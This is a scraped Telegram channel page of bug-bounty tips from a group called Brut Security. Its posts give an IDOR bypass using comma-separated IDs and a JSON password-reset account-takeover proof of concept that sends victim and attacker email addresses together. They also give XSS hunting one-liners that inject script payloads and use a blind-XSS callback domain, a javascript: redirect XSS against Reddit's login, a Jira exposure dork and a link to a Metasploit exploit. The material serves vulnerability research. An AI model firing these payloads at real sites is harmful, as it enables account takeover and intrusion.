Brut Security
14.8K subscribers
941 photos
73 videos
288 files
986 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Hey, don’t forget to like and share! And if you give it a try, tell us β€” we’d love to know how you’re using it!
❀12πŸ‘7
πŸ’‘ IDOR Bypass Bug Bounty Tip

Sometimes APIs behave unexpectedly when multiple IDs are passed together.

πŸ” Scenario
β€’ Victim’s ID: 5200
β€’ Attacker’s ID: 5233

🚫 GET /api/users/5200/info β†’ Access Denied
βœ… GET /api/users/5200,5233/info β†’ Bypass Successful

πŸ“Œ Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!

#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
πŸ”₯28πŸ‘12❀10πŸ‘2
🚨 CVE-2025-2563 🚨- A Metasploit module to exploit an unauthenticated privilege escalation in the WordPress User Registration & Membership plugin (Free < 4.1.2, Pro < 5.1.2) [+70k installs].

▢️ https://github.com/rapid7/metasploit-framework/pull/20159
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘11❀5πŸ”₯1
βœ…RBAC Checklist
πŸ‘14❀3
Brut Security
Password Reset Bypass Trick πŸŒ€ Some poorly secured endpoints accept multiple email parameters.😳 Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {…
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 πŸ™ŒπŸΌ

πŸ’₯ GitLab Password Reset via Account Takeover Vulnerability 😬

This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email 🀯

βœ… POC Request:

"user": {
    "email": [
        "[email protected]",
        "[email protected]"
    ]
}


I was shared this same method a long time ago 😁
Don't forget to follow me πŸ‘‰πŸΌ
DarkShadow
πŸ—Ώ16πŸ”₯11❀6πŸ‘6😱3
🀣30πŸ‘2😁1
Hey Hunters,
DarkShadow hereβ€”back again with a quick drop!

If you're using
revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellβ€”no more manual payload hunting!

Let me know if you needπŸ‘€
πŸ”₯19πŸ‘7🐳2
πŸ‘Brut Security just hit 12K+ members!

⭐️Huge thanks to everyone supporting the community.
More tools, tips, and hacking content coming your way!

Stay connected with us β€” the journey has just begun.
Don’t forget to like and share! πŸ™Œ
Please open Telegram to view this post
VIEW IN TELEGRAM
2πŸ‘25❀11πŸ”₯4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commandsπŸ˜‰

Cleaned XSS Payload Hunting Commands:


1. Wayback + httpx + GF + Dalfox

cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done

2. Gospider + Dalfox

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe
3. Wayback + GF + Blind XSS via Dalfox

waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe


4. Gospider + Dalfox (Deep Crawl)

gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt
5. Dalfox Direct with Blind XSS

cat urls.txt | dalfox pipe -b yourdomain.xss



Required tools are:

httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox

If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me πŸ‘‰πŸΌ DarkShadow

#bugbountytips #xss
πŸ”₯13πŸ‘7πŸ‘5πŸ‘¨β€πŸ’»3
Which browser you use?
🀣38πŸ—Ώ9❀4😁1
Good morning hacker's,
Let's start morning to hack Reddit account πŸ˜‰
😁11🫑2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!

Let’s break it down and understand the logic behind the vulnerability.


Vulnerable Parameter: ?dest=

What does the dest parameter do?

The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:

A user tries to access a protected page.

Reddit redirects them to:
/login/?dest=/protected/resource

After login, the site redirects them to the original dest URL.

Sounds fine, right? But here’s the twist...


βœ… PoC Steps (Super Simple):

https://www.reddit.com/login/?dest=javascript:alert(document.domain)


BoomπŸ’₯. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation β€” just a mindset shift.


keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and
follow me in X
πŸ‘‰πŸΌ
DarkShadow

#bugbountytips #xss
πŸ‘18πŸ‘10πŸ”₯7πŸ—Ώ4❀2
Hey Hunter's,
DarkShadow here back again, dropping a killer trick πŸŒ€

Before testing file upload vulnerability, test the filename parameter.

Don't forget to show your love, and follow me πŸ‘‰πŸΌ
DarkShadow
πŸ”₯22πŸ‘7❀3πŸ‘3🐳1πŸ‘¨β€πŸ’»1🫑1
⚠️Origin Recon: The Ultimate ASN & Origin Detection Tool⚠️

πŸ”₯Features-
➑️Subdomain extraction via Certificate Transparency (CRT.sh)
➑️DNS resolution with SSRF protection
➑️IP geolocation and ASN analysis
➑️Common port scanning (80, 443, 22, etc.)
➑️Critical origin IP detection (non-CDN)

βœ”οΈhttps://github.com/NazaninNazari/Origin_Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘19πŸ”₯10
Forwarded from Brut Security 2.0
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 rating❗️

The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/lVuft
πŸ‘‰ Dork: http.meta:"content=\"JIRA\""

Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
πŸ”₯6πŸ‘2
⚑️Just a heads-up β€” BrutRecon Pro v2 is in the works.

πŸ’­Starting with clean domain scraping from bug bounty scope pages.

πŸ”₯No noise. No junk.
The heavy recon features? Still cooking.

πŸ’₯Stay tuned.

πŸ”— addons.mozilla.org/addon/brutscope-extractor
Please open Telegram to view this post
VIEW IN TELEGRAM
❀24πŸ‘5